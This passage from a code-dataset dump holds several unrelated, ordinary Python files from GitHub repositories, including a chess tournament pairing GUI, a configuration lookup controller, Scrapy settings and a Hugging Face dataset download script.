First_player = None\r\n Second_player = None\r\n \r\n for item in self.list_of_players:\r\n if item.user_id == self.player_one_id:\r\n First_player = item\r\n elif item.user_id == self.player_two_id: \r\n Second_player = item \r\n \r\n if First_player == None and Second_player == None:\r\n print(\"Blad, brakuje ID\")\r\n \r\n added_first_user_points = int(self.first_new_user_points.get())\r\n added_second_user_points = int(self.second_new_user_points.get())\r\n first_user_points = First_player.user_points\r\n second_user_points = Second_player.user_points\r\n \r\n if (added_first_user_points != None and added_second_user_points != None):\r\n First_player.user_points = added_first_user_points + first_user_points\r\n Second_player.user_points = added_second_user_points + second_user_points\r\n First_player.oponents.append(Second_player.user_id)\r\n Second_player.oponents.append(First_player.user_id)\r\n\r\n if First_player.user_color[0] >= First_player.user_color[1]: \r\n First_player.user_color[1] = First_player.user_color[1] + 1\r\n else:\r\n First_player.user_color[0] = First_player.user_color[0] + 1\r\n \r\n if Second_player.user_color[0] >= Second_player.user_color[1]: \r\n Second_player.user_color[1] = Second_player.user_color[1] + 1\r\n else:\r\n Second_player.user_color[0] = Second_player.user_color[0] + 1\r\n \r\n First_player.user_round = First_player.user_round + 1\r\n Second_player.user_round = Second_player.user_round + 1\r\n \r\n print(First_player.user_name, \" rozegral walke z \", Second_player.user_name)\r\n print(First_player.user_name, \"(\", First_player.user_id ,\") walczyl juz z \", First_player.oponents)\r\n print(Second_player.user_name, \"(\", Second_player.user_id , \") walczyl juz z \", Second_player.oponents)\r\n \r\n print(\"Gracz \", First_player.user_name, \" otrzymal punktow: \", \r\n added_first_user_points, \"i ma ich obecnie\", First_player.user_points, \" tego gracza to \", \r\n First_player.user_round, \" runda.\")\r\n print(\"Gracz \", Second_player.user_name, \" otrzymal punktow: \", \r\n added_second_user_points, \"i ma ich obecnie\", Second_player.user_points, \" tego gracza to \", \r\n Second_player.user_round, \" runda.\")\r\n \r\n self.first_new_user_points = StringVar()\r\n self.second_new_user_points = StringVar()\r\n self.First_user_name.set(\"\")\r\n self.Second_user_name.set(\"\")\r\n if (self.third_unpaired_list != []):\r\n self.third_unpaired_list[0].user_points = self.third_unpaired_list[0].user_points + 1\r\n print(\"Gracz\", self.third_unpaired_list[0].user_name, \" otrzymuje wolny los, czyli dostaje punkt bez gry.\")\r\n print(self.third_unpaired_list[0].user_name, \" ma wiec teraz: \", self.third_unpaired_list[0].user_points)\r\n self.third_unpaired_list[0].user_round = self.third_unpaired_list[0].user_round + 1\r\n self.third_unpaired_list[0].free_point = 1\r\n self.updateTable()\r\n self.add_points(DISABLED)\r\n\r\n def add_points(self, status):\r\n if status == ACTIVE:\r\n Add_new_user = ttk.Button(self.Tou_frame, text=\"Przyznaj punkty\", \r\n command = self.add_points_to_players, state = ACTIVE)\r\n Add_new_user.grid(column=3, row=5, sticky=W, pady=6, padx=6)\r\n Results_button = ttk.Button(self.Tou_frame, state = DISABLED, \r\n text=\"Pokaz ostateczne wyniki >>\", command = self.next)\r\n Results_button.grid(column=3, row=6, sticky=W, pady=6, padx=6)\r\n Search_players_button = ttk.Button(self.Tou_frame, text=\"Wylosuj graczy\", state = DISABLED)\r\n Search_players_button.grid(column=3, row=3, sticky=W, pady=6, padx=6)\r\n \r\n First_player_points_box = Spinbox(self.Tou_frame, from_=0.0, to=10000.0,\r\n textvariable=self.first_new_user_points, state = NORMAL)\r\n First_player_points_box.grid(column=1, row=5, sticky=(W, E), pady=6, padx=6)\r\n Second_player_points_box = Spinbox(self.Tou_frame, from_=0.0, to=10000.0,\r\n textvariable=self.second_new_user_points, state = NORMAL)\r\n Second_player_points_box.grid(column=2, row=5, sticky=(W, E), pady=6, padx=6)\r\n print(\"ACTIVE\")\r\n \r\n if status == DISABLED:\r\n Add_new_user = ttk.Button(self.Tou_frame, text=\"Przyznaj punkty\", state = DISABLED)\r\n Add_new_user.grid(column=3, row=5, sticky=W, pady=6, padx=6)\r\n Results_button = ttk.Button(self.Tou_frame, state = ACTIVE, text=\"Pokaz ostateczne wyniki >>\", \r\n command = self.next)\r\n Results_button.grid(column=3, row=6, sticky=W, pady=6, padx=6)\r\n Search_players_button = ttk.Button(self.Tou_frame, text=\"Wylosuj graczy\", \r\n command = self.look_for_players, state = ACTIVE)\r\n Search_players_button.grid(column=3, row=3, sticky=W, pady=6, padx=6)\r\n \r\n First_player_points_box = Spinbox(self.Tou_frame, from_=0.0, to=10000.0,\r\n textvariable=self.first_new_user_points, state = DISABLED)\r\n First_player_points_box.grid(column=1, row=5, sticky=(W, E), pady=6, padx=6)\r\n Second_player_points_box = Spinbox(self.Tou_frame, from_=0.0, to=10000.0,\r\n textvariable=self.second_new_user_points, state = DISABLED)\r\n Second_player_points_box.grid(column=2, row=5, sticky=(W, E), pady=6, padx=6)\r\n print(\"DISABLED\")\r\n \r\n def updateTable(self):\r\n self.players_list = Listbox(self.Tou_frame, width = 55, height = 10, yscrollcommand=self.scrollbar.set, \r\n exportselection=0)\r\n i = 0\r\n print(\"Lista posortowana\")\r\n sort_list = sorted(Player._registry, key=lambda player: player.user_points, reverse=True)\r\n print(sort_list)\r\n for item in sort_list:\r\n len_of_name = len(item.user_name)\r\n user_space = 20 - len_of_name\r\n user_line =\" \"\r\n for _ in range(user_space):\r\n user_line +=\" \"\r\n user_line = item.user_name + str(user_line) + str(item.user_points) \r\n user_line += str(\" pkt, \") + str(\" rozegranych rund: \") + str(item.user_round - 1) \r\n self.players_list.insert(i, user_line)\r\n i += 1\r\n \r\n List_of_users = ttk.Label(self.Tou_frame, text=\"Wyniki uczestnikow:\")\r\n List_of_users.grid(column=6, row=1, sticky=W)\r\n \r\n self.players_list.grid(column=6, columnspan=2, row=2, rowspan = 2, sticky=N, pady=6)\r\n self.scrollbar.grid(column=8, columnspan=2, row = 2, rowspan = 4, sticky=N, pady = 7, ipady = 55)\r\n \r\n def createWidgets(self):\r\n ttk.Label(self.Tou_frame, text=\"Przyznaj punkty wybranym przez system gracza\").grid(\r\n column=2, columnspan=2, row=1, sticky=W, pady=6)\r\n \r\n # 1 Column\r\n First_player_points_entry = ttk.Entry(self.Tou_frame, width=7, textvariable=self.First_user_name,\r\n state = DISABLED)\r\n First_player_points_entry.grid(column=1, row=3, sticky=(W, E), pady=6, padx=6)\r\n ttk.Label(self.Tou_frame, text=\"Imie i nazwisko:\").grid(column=1, row=2, sticky=W, pady=6, padx=6)\r\n ttk.Label(self.Tou_frame, text=\"Punkty rankingowe:\").grid(column=1, row=4, sticky=W, pady=6, padx=6)\r\n\r\n # 2 Column\r\n Second_player_points_entry = ttk.Entry(self.Tou_frame, width=7, \r\n textvariable=self.Second_user_name, state = DISABLED)\r\n Second_player_points_entry.grid(column=2, row=3, sticky=(W, E), pady=6, padx=6)\r\n ttk.Label(self.Tou_frame, text=\"Imie i nazwisko:\").grid(column=2, row=2, sticky=W, pady=6, padx=6)\r\n ttk.Label(self.Tou_frame, text=\"Punkty rankingowe:\").grid(column=2, row=4, sticky=W, pady=6, padx=6)\r\n \r\n # 6 Row\r\n Button_End_Program = ttk.Button(self.Tou_frame, text=\"Zakoncz\", command=self.quit)\r\n Button_End_Program.grid(column=5, row=6, sticky=W, pady=6, padx=6)\r\n\r\n self.rounde.set(self.round)\r\n ttk.Label(self.Tou_frame, text=\"Tura:\").grid(column=1, row=6, sticky=W)\r\n ttk.Label(self.Tou_frame, textvariable=self.rounde).grid(column=1, row=6, sticky=W, padx=30)\r\n \r\n self.add_points(DISABLED)\r\n \r\n def look_for_players(self):\r\n if self.first_players_list == [] and self.second_players_list == []:\r\n print(\"Trwa runda:\", self.round)\r\n self.create_list(\"rank\")\r\n self.get_id_players()\r\n else:\r\n self.get_id_players()\r\n \r\n def get_id_players(self):\r\n print(\"ID - Start\") \r\n self.player_one_id = None\r\n self.player_two_id = None\r\n \r\n if self.first_players_list != []:\r\n print(\"ID - 1\")\r\n for item in self.first_players_list:\r\n if item.user_round == self.round:\r\n if item.user_color[0] < 3 and item.user_color[1] < 3:\r\n self.player_one_oponents = item.oponents\r\n self.player_one_id = item.user_id \r\n print(self.player_one_id)\r\n break\r\n else:\r\n if self.round == len(self.list_of_players):\r\n self.next()\r\n return 0\r\n else:\r\n print(\"Pusta lista nr 1!\") \r\n \r\n if self.second_players_list != []:\r\n print(\"ID - 2\") \r\n for item in self.second_players_list:\r\n if item.user_round == self.round:\r\n self.player_two_oponents = item.oponents\r\n if self.player_one_id not in self.player_two_oponents:\r\n if item.user_color[0] < 3 and item.user_color[1] < 3:\r\n print(self.player_one_oponents)\r\n print(self.player_two_oponents)\r\n self.player_two_id = item.user_id\r\n \r\n print(self.player_two_id)\r\n break\r\n else:\r\n if self.round == len(self.list_of_players):\r\n self.next()\r\n return 0\r\n else:\r\n print(\"Pusta lista nr 2!\") \r\n print(\"ID - Koniec\") \r\n self.next_round()\r\n \r\n def next_round(self):\r\n if self.player_one_id != None and self.player_two_id != None:\r\n pass\r\n else:\r\n self.round += 1;\r\n print(\"Trwa runda:\", self.round)\r\n self.create_list(\"points\")\r\n self.get_id_players()\r\n self.take_id_and_get_players()\r\n self.createWidgets()\r\n self.add_points(ACTIVE)\r\n\r\n def take_id_and_get_players(self):\r\n print(\"TAKE ID\")\r\n player = Player\r\n for player in player._registry:\r\n if player.user_id == self.player_one_id:\r\n First_player = player\r\n self.First_user_name.set(First_player.user_name) \r\n print(First_player.user_name)\r\n else:\r\n continue\r\n \r\n for player in player._registry:\r\n if player.user_id == self.player_two_id: \r\n Second_player = player\r\n self.Second_user_name.set(Second_player.user_name) \r\n print(Second_player.user_name)\r\n else:\r\n continue\r\n \r\n def create_list(self, user_type):\r\n i = 0\r\n self.list_of_players = []\r\n self.first_players_list = []\r\n self.second_players_list = []\r\n self.third_unpaired_list = []\r\n \r\n for player in Player._registry:\r\n self.list_of_players.append(player)\r\n i +=1\r\n print(\"Lista uczestnikow\")\r\n print(self.list_of_players)\r\n \r\n if user_type == \"points\":\r\n self.list_of_players = sorted(Player._registry, key=lambda player: player.user_points, reverse=True)\r\n if user_type == \"rank\":\r\n self.list_of_players = sorted(Player._registry, key=lambda player: player.user_rank)\r\n print(\"Lista posortowana\")\r\n print(self.list_of_players)\r\n \r\n i = 0\r\n number_of_players = int((len(self.list_of_players))) \r\n \r\n if user_type == \"points\":\r\n \r\n if number_of_players % 2 != 0:\r\n for item in self.list_of_players:\r\n i += 1\r\n if i == number_of_players and item.free_point != 1:\r\n self.third_unpaired_list.append(item)\r\n elif i % 2 == 1 and item.free_point == 1:\r\n self.second_players_list.append(item) \r\n item.free_point = 0\r\n elif i % 2 == 0 and item.free_point == 1:\r\n self.first_players_list.append(item) \r\n item.free_point = 0\r\n elif i % 2 == 1:\r\n self.second_players_list.append(item) \r\n elif i % 2 == 0:\r\n self.first_players_list.append(item) \r\n \r\n else:\r\n for item in self.list_of_players:\r\n i += 1\r\n if i % 2 == 1:\r\n self.second_players_list.append(item) \r\n elif i % 2 == 0:\r\n self.first_players_list.append(item) \r\n \r\n if user_type == \"rank\":\r\n \r\n if number_of_players % 2 != 0:\r\n for item in self.list_of_players:\r\n i += 1\r\n if i > int(number_of_players/2) and i < int(number_of_players):\r\n self.second_players_list.append(item) \r\n elif i <= int(number_of_players/2):\r\n self.first_players_list.append(item) \r\n else:\r\n self.third_unpaired_list.append(item) \r\n else:\r\n for item in self.list_of_players:\r\n i += 1\r\n if i > int(number_of_players/2):\r\n self.second_players_list.append(item) \r\n else:\r\n self.first_players_list.append(item) \r\n \r\n print(\"Lista podzielona\")\r\n print(\"Lista nr 1\")\r\n print(self.first_players_list) \r\n print(\"Lista nr 2\") \r\n print(self.second_players_list)\r\n print(\"Lista nr 3 (nie ma pary)\") \r\n print(self.third_unpaired_list)\r\n","repo_name":"MateuszG/Chess-system","sub_path":"Tournament.py","file_name":"Tournament.py","file_ext":"py","file_size_in_byte":17615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19003772588","text":"\"\"\"\nKheops controller\n\nMain Kheops model classes\n\"\"\"\n\nimport json\nimport logging\n\n# from pprint import pprint\n\nfrom pathlib import Path\nfrom prettytable import PrettyTable\n\nimport kheops.plugin as KheopsPlugins\nfrom kheops.utils import render_template_python, str_ellipsis\n\n\nlog = logging.getLogger(__name__)\ntracer = logging.getLogger(f\"{__name__}.explain\")\n\n\n\n# Helper classes\n# ------------------------\n\nclass LoadPlugin:\n \"\"\"Kheops plugins loader\n\n This plugin loader is a helper to load a python module (Kheops Plugin) from\n a plugin kind and name.\n \"\"\"\n\n def __init__(self, plugins):\n self.plugins = plugins\n\n def load(self, kind, name):\n \"\"\"\n Load a plugin\n \"\"\"\n\n assert isinstance(name, str), f\"Got: {name}\"\n\n # Get plugin kind\n try:\n plugins = getattr(self.plugins, kind)\n except AttributeError as err:\n raise Exception(f\"Unknown module kind '{kind}': {err}\") from err\n\n # Get plugin class\n try:\n plugin_cls = getattr(plugins, name)\n except AttributeError as err:\n raise Exception(f\"Unknown module '{kind}.{name}': {err}\") from err\n\n assert hasattr(\n plugin_cls, \"Plugin\"\n ), f\"Plugin {kind}/{name} is not a valid plugin\"\n\n # Return plugin Classe\n return plugin_cls.Plugin\n\nclass BackendCandidate():\n \"\"\"Backend Candidate\n\n This object represents a backend candidate. It holds the value of the\n requested key, but also so source path, the status and some other metadata.\n \"\"\"\n\n def __init__(self, path=None, data=None, run=None, status=None):\n assert isinstance(run, dict)\n self.path = path\n self.status = status or \"unparsed\"\n self.run = run or {}\n self.data = data or None\n\n def __repr__(self):\n return f\"Status: {self.status}, Path: {self.path} => {self.data}\"\n\n\nclass Query:\n \"\"\"Query object\n\n Object that hold key and scope.\n \"\"\"\n\n key = None\n scope = None\n\n def __init__(self, key, scope):\n self.key = key or None\n self.scope = scope or {}\n\n self.rule = None\n\n\n# Query Processor class\n# ------------------------\n\nclass QueryProcessor:\n \"\"\"QueryProcessor\n\n This class helps to do queries for a given key and scope. It provides a single\n public method. It also implement an explain mechanism to help to troubleshoot query\n lookup issues.\n\n The query process consists in:\n * Create a new query with the key and th scope\n * Fetch and expand the lookup list (_exec_assemble_lookups)\n * Fetch the rule that match the key (_exec_get_rule)\n * Fetch the strategy that match the key\n * Query all backends with lookup list (_exec_backend_plugins)\n * Return result\n\n \"\"\"\n\n default_match_rule = {\n \"key\": None,\n \"continue\": False,\n \"strategy\": \"merge_schema\",\n }\n\n default_lookup_item = {\n \"path\": None,\n \"backend\": \"file\",\n \"continue\": True,\n }\n\n def __init__(self, config):\n self.plugin_loader = LoadPlugin(KheopsPlugins)\n self.config = config\n\n # Query methods\n # ------------------------\n\n def query(self, key=None, scope=None, explain=False):\n \"\"\"Query key with scope\n\n \"\"\"\n\n if explain:\n tracer.setLevel(logging.DEBUG)\n\n query = Query(key, scope)\n log.info(\"Creating new query: %s\", query.__dict__)\n\n # Match the KeyRule in keys (RULE CACHE)\n # Get the matching keys\n # Assemble if more than one and merge when continue.\n # Got the Matched rule (RULE CACHE)\n # We'll need strategy, and it's selector field: matched/first/last/all\n key_rule = self._exec_get_rule(query)\n log.info(\"Matched rule for key '%s': %s\", query.key, key_rule)\n\n # Build the lookups [] => []\n # Fetch static config from app (for include and NS:includes ...)\n # Loop over lookups and process each lookup with ScopePlugins\n lookups = self.config[\"lookups\"].copy()\n parsed_lookups = self._exec_assemble_lookups(lookups, query)\n\n # Generate explain report\n if explain:\n self._explain_lookups(parsed_lookups)\n\n # Fetch the module\n # Retrieve the module instance\n plugin_name = key_rule.get(\"strategy\", None)\n strategy_plugin = self.plugin_loader.load(\"strategy\", plugin_name)(self)\n\n # Get the data (strategy.selector)\n # For each entry, ask the backend to return the data: file, http, consul ...\n # Return zero, one or more results depending the strategy.selector\n # result = get_backends_results(strategy, lookups)\n candidates = self._exec_backend_plugins(\n parsed_lookups, selector=strategy_plugin.selector\n )\n\n # Generate explain report\n if explain:\n self._explain_candidates(candidates, query)\n\n # Apply the merge strategy, recall strategy\n result = strategy_plugin.merge_results(candidates, key_rule, query)\n\n # TODO: Apply output plugins\n # result = self._exec_output_plugins(result)\n\n return result\n\n\n # Query parts methods\n # ------------------------\n\n def _exec_get_rule(self, query, mode=\"match\"):\n\n key = query.key\n rules = self.config[\"rules\"] or {}\n\n if mode == \"match\":\n rule = dict(self.default_match_rule)\n rules = [i for i in rules if i.get(\"key\", None) == key]\n if len(rules) > 0:\n match = rules[0]\n rule.update(match)\n else:\n log.debug(\"Applying default rule for key '%s'\", key)\n rule = self.default_match_rule\n else:\n raise Exception(f\"Mode '{mode}' is not implemented\")\n\n return rule\n\n\n def _exec_assemble_lookups(self, lookups, query):\n\n assert isinstance(lookups, list)\n assert len(lookups) > 0\n\n # Init the scope list\n new_lookups1 = []\n for index, lookup_def in enumerate(lookups):\n #shortform = False\n\n if isinstance(lookup_def, str):\n #shortform = True\n lookup_def = {\n \"path\": lookup_def,\n }\n assert isinstance(lookup_def, dict)\n\n new_lookup = dict(self.default_lookup_item)\n new_lookup.update(lookup_def)\n new_lookup[\"_run\"] = {\n \"scope\": query.scope,\n \"key\": query.key,\n \"conf\": {\n \"index\": index,\n }\n # 'shortform': shortform,\n }\n new_lookups1.append(new_lookup)\n\n # Apply lookups modules\n new_lookups2 = []\n for index, lookup in enumerate(new_lookups1):\n plugins = lookup.get(\"scope\", [])\n\n ret = [lookup]\n for plugin_def in plugins:\n plugin_name = plugin_def.get(\"module\", None)\n\n if plugin_name:\n plugin = self.plugin_loader.load(\"scope\", plugin_name)(namespace=self)\n ret = plugin.process_items(ret, plugin_def)\n\n new_lookups2.extend(ret)\n\n # Parse the `path` value with scope variables\n new_lookups3 = []\n for lookup in new_lookups2:\n path = lookup[\"path\"]\n scope = lookup[\"_run\"][\"scope\"]\n new_path = render_template_python(path, scope, ignore_missing=False)\n if new_path:\n lookup[\"_run\"][\"raw_path\"] = path\n lookup[\"path\"] = new_path\n new_lookups3.append(lookup)\n else:\n log.warning(\"Ignore lookup item because of missing scope vars: '%s'\", path)\n\n return new_lookups3\n\n\n def _exec_backend_plugins(self, lookups, selector=\"matched\"):\n selector = \"matched\"\n assert selector in [\"last\", \"first\", \"all\", \"matched\"]\n assert isinstance(lookups, list)\n # lookups = self.config.get(\"lookups\", {}).copy()\n\n plugins = {}\n ret = []\n for index, lookup_def in enumerate(lookups):\n\n # Update object\n lookup_def[\"_run\"][\"backend_index\"] = index\n\n # Load plugin\n plugin_name = lookup_def[\"backend\"]\n if plugin_name in plugins:\n plugin = plugins[plugin_name]\n else:\n plugin = self.plugin_loader.load(\"backend\", plugin_name)(namespace=self)\n\n # Get candidates\n candidates = plugin.fetch_data(lookup_def)\n\n # Apply selector\n for candidate in candidates:\n if candidate.status == \"found\" or selector == \"all\":\n ret.append(candidate)\n\n return ret\n\n # Explain methods\n # ------------------------\n\n def _explain_lookups(self, parsed_lookups):\n \"\"\"Explain list of lookups\"\"\"\n\n table = PrettyTable()\n for item in parsed_lookups:\n col1 = json.dumps(\n {k: v for k, v in item.items() if k not in [\"_run\"]},\n default=lambda o: \"\",\n indent=2,\n )\n col2 = json.dumps(\n item[\"_run\"], default=lambda o: \"\", indent=2\n )\n table.add_row(\n [\n \"\\nConfig:\" + str_ellipsis(col1, 60),\n \"\\nRuntime:\" + str_ellipsis(col2, 60),\n ]\n )\n table.field_names = [\"Config\", \"Runtime\"]\n table.align = \"l\"\n tracer.info(\"Explain lookups:\\n%s\", str(table))\n\n def _explain_candidates(self, candidates, query):\n \"\"\"Explain list of candidates\"\"\"\n\n # TOFIX: query is not needed here !\n\n table = PrettyTable()\n for item_obj in candidates:\n item = item_obj.__dict__\n item[\"rel_path\"] = str(Path(item[\"path\"]).relative_to(Path.cwd()))\n\n col1 = json.dumps(\n {k: v for k, v in item.items() if k not in [\"run\", \"data\"]},\n default=lambda o: \"\",\n indent=2,\n )\n col2 = json.dumps(\n item[\"run\"][\"_run\"], default=lambda o: \"\", indent=2\n )\n col3 = (\n item_obj.data.get(query.key, \"NOT FOUND\")\n if query.key is not None and isinstance(item_obj.data, dict)\n else item_obj.data\n )\n col3 = json.dumps(col3, default=lambda o: \"\", indent=2)\n table.add_row(\n [\n \"\\nStatus:\" + str_ellipsis(col1, 80),\n \"\\nRuntime:\" + str_ellipsis(col2, 60),\n \"\\nKey:\" + str_ellipsis(col3, 60),\n ]\n )\n\n table.field_names = [\"Status\", \"Runtime\", \"Key Value\"]\n table.align = \"l\"\n tracer.info(\"Explain candidates:\\n%s\", str(table))\n","repo_name":"barbu-it/kheops","sub_path":"kheops/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":10985,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70623380330","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for deepin project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'deepin'\n\nSPIDER_MODULES = ['deepin.spiders']\nNEWSPIDER_MODULE = 'deepin.spiders'\n\nDEFAULT_ITEM_CLASS = 'deepin.items.Problem'\n\nITEM_PIPELINES = {\n\t'deepin.pipelines.StoreToMongoDB': 1\n}\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\nUSER_AGENT = 'QSCTech (+http://tech.myqsc.com/)'\n","repo_name":"YuzhongHuangCS/scrapy-bots","sub_path":"deepin/deepin/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3121469319","text":"\nimport os\n\nd = {'mean': [1,2 ,3, 4, 5, 6, 7], 'std': [1, 2, 3, 4, 5, 6, 7]}\npath_dir = os.path.abspath(os.path.dirname(__file__))\nprint (path_dir)\npkl_dir = path_dir + '/test.pkl'\nprint (pkl_dir)\nimport pickle\nwith open(pkl_dir, 'wb') as f:\n pickle.dump(d, f, pickle.HIGHEST_PROTOCOL)","repo_name":"Taospirit/Light_RL","sub_path":"beta/test/test_pickle.py","file_name":"test_pickle.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24936349696","text":"from collections import deque\n\n\nrows, columns = [int(a) for a in input().split(\" \")]\nmatrix = [[0] * columns for row in range(rows)]\n\nsnake = deque(input())\n\nfor row in range(rows):\n if row % 2 == 0:\n for column in range(columns):\n current_char = snake.popleft()\n matrix[row][column] = current_char\n snake.append(current_char)\n\n else:\n for column in range(columns - 1, -1, -1):\n current_char = snake.popleft()\n matrix[row][column] = current_char\n snake.append(current_char)\n\n[print(\"\".join(line)) for line in matrix]\n\n# Dilyan\n\n# from collections import deque\n#\n# rows, cols = [int(x) for x in input().split()] # cols = 6\n# word = list(input()) # abc => [\"a\", \"b\", \"c\"]\n#\n# word_copy = deque(word)\n#\n# for row in range(rows):\n# while len(word_copy) < cols:\n# word_copy.extend(word)\n#\n# if row % 2 == 0:\n# print(*[word_copy.popleft() for _ in range(cols)], sep=\"\")\n# else:\n# print(*[word_copy.popleft() for _ in range(cols)][::-1], sep=\"\")\n\n","repo_name":"Polishko/SoftUni","sub_path":"Python Advanced Exercises/Multidimensional Lists - 1/snake_moves.py","file_name":"snake_moves.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72268813929","text":"import csv\nfrom kjellar.member import Member, getServer, setServer\n\nasync def csvToPkl(guild, msg, file):\n csvf = open(file, \"rt\")\n reader = csv.reader(csvf)\n\n server = getServer(guild)\n nr = 1 \n for line in reader:\n if line[0] == \"name\":\n continue\n\n for user in guild.members:\n print(line[0])\n print(user.name)\n if line[0] == user.name:\n uid = user.id\n break\n\n server.users[uid] = Member(guild, uid, line[0], int(line[2]), int(line[1]), int(line[3]), int(line[6]), int(line[4]))\n await msg.channel.send(f\"added {line[0]} to the database.\")\n nr += 1\n \n setServer(server)","repo_name":"haoii15/VirtualLinda_Public","sub_path":"kjellar/csvtopkl.py","file_name":"csvtopkl.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75072470887","text":"# coding:utf-8\n\nclass Solution(object):\n def selfDividingNumbers(self,left,right):\n \"\"\"\n\n :param left: int\n :param right: int\n :return: List[int]\n \"\"\"\n\n return list(filter(lambda y:y, map(lambda x:x if all([False if i == '0' else int(x) % int(i) == 0 for i in str(x)]) else False, range(left, right+1))))\n\n\n\ndef main():\n left = int(input(\"Please input left:\"))\n right = int(input(\"Please input right:\"))\n\n test = Solution()\n\n print(test.selfDividingNumbers(left,right))\n\n\nif __name__ == '__main__' :\n main()","repo_name":"daisy0x00/LeetCode_Python","sub_path":"LeetCode728/LeetCode728.py","file_name":"LeetCode728.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11463597787","text":"class Station:\n def __init__(self, abbr, name, lat, lng, segments, system):\n self.abbr = abbr\n self.name = name\n self.lat = lat\n self.lng = lng\n self.segments = segments\n self.trains = None\n self.system = system\n\n def add_containing_segment(self, segment):\n if not segment in self.segments:\n assert(segment.n_station == self or segment.s_station == self)\n self.segments.append(segment)\n\n def segment_to_station(self, other_station):\n segment_to_station = None\n for segment in self.segments:\n if segment.n_station == other_station or segment.s_station == other_station:\n segment_to_station = segment\n return segment_to_station\n\n def __repr__(self):\n return \"\" % self.name","repo_name":"aaroncohen/BARTsim","sub_path":"station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21647859673","text":"import argparse\nimport json\nimport os\nimport tarfile\nimport zipfile\n\nfrom huggingface_hub import hf_hub_download\n\nDATASETS = {\"ai_society\": \"ai_society_chat.tar.gz\", \n \"code\": \"code_chat.tar.gz\", \n \"math\": \"math.zip\", \n \"physics\": \"physics.zip\", \n \"chemistry\": \"chemistry.zip\", \n \"biology\": \"biology.zip\",\n \"sharegpt\": [\"sg_90k_part1.json\", \"sg_90k_part2.json\"],\n \"alpaca\": \"train-00000-of-00001-a09b74b3ef9c3b56.parquet\"}\n\n# Download datasets\ndef download_hf_dataset(dataset, download_directory):\n if dataset == \"sharegpt\":\n for file in DATASETS[dataset]:\n if os.path.exists(os.path.join(download_directory, \"HTML_cleaned_raw_dataset\", file)):\n continue\n hf_hub_download(repo_id=\"anon8231489123/ShareGPT_Vicuna_unfiltered\", repo_type=\"dataset\", filename=file,\n subfolder=\"HTML_cleaned_raw_dataset\", local_dir=download_directory, local_dir_use_symlinks=False)\n elif dataset == \"alpaca\":\n if os.path.exists(os.path.join(download_directory, \"data\", DATASETS[dataset])):\n return\n hf_hub_download(repo_id=\"tatsu-lab/alpaca\", repo_type=\"dataset\", filename=DATASETS[dataset],\n subfolder=\"data\", local_dir=download_directory, local_dir_use_symlinks=False)\n else:\n if os.path.exists((os.path.join(download_directory, DATASETS[dataset]))):\n return\n hf_hub_download(repo_id=f\"camel-ai/{dataset}\", repo_type=\"dataset\", filename=DATASETS[dataset],\n local_dir=download_directory, local_dir_use_symlinks=False)\n\n# Extract CAMEL datasets and remove compressed files\ndef unzip_datasets(download_directory):\n print(\"Extracting datasets...\")\n files = [f for f in os.listdir(download_directory) if os.path.isfile(os.path.join(download_directory, f))]\n for file in files:\n file_path = os.path.join(download_directory, file)\n if tarfile.is_tarfile(file_path):\n with tarfile.open(file_path) as tar:\n tar.extractall(os.path.join(\"datasets\", file.split('.')[0]))\n os.remove(file_path)\n elif zipfile.is_zipfile(file_path):\n with zipfile.ZipFile(file_path, 'r') as zip_ref:\n zip_ref.extractall(os.path.join(\"datasets\", file.split('.')[0]))\n os.remove(file_path)\n else: \n pass\n\ndef download_dataset(dataset, download_directory):\n\n try:\n download_hf_dataset(dataset, download_directory)\n except:\n print(f\"{dataset} could not be downloaded\")\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--datasets\", nargs='+', choices=list(DATASETS.keys())+[\"all\"], type=str)\n parser.add_argument(\"--download_directory\", type=str, default=\"datasets\")\n\n args = parser.parse_args()\n\n if not os.path.exists(args.download_directory):\n os.makedirs(args.download_directory)\n\n if args.datasets == [\"all\"]:\n args.datasets = list(DATASETS.keys())\n \n for dataset in args.datasets:\n download_dataset(dataset, args.download_directory)\n\n unzip_datasets(args.download_directory)\n","repo_name":"camel-ai/camel_chat","sub_path":"camel_chat/data_preprocessing/download_datasets.py","file_name":"download_datasets.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"38516717897","text":"n=int(input())\r\nl=list(map(int,input().split()))[:n]\r\np=len(l)//2\r\ng=0\r\nx=l[p:]\r\ny=l[:p]\r\nif (sum(x)//len(x))==(sum(y)//len(y)):\r\n g=1\r\nif(g==1):\r\n print(\"yes\")\r\nelse:\r\n print(\"no\")","repo_name":"shifelfs/shifel","sub_path":"p21.py","file_name":"p21.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19668299431","text":"#!/usr/bin/env python3\n\n\"\"\"\nDraw some diagnostics plots from an hdf5 file\n\"\"\"\n\nfrom argparse import ArgumentParser\nfrom h5py import File\nfrom ndhist.mpl import Canvas\nimport numpy as np\n\ndef get_args():\n parser = ArgumentParser(description=__doc__)\n parser.add_argument('input_file')\n parser.add_argument('-n', '--nevents', default=100000, 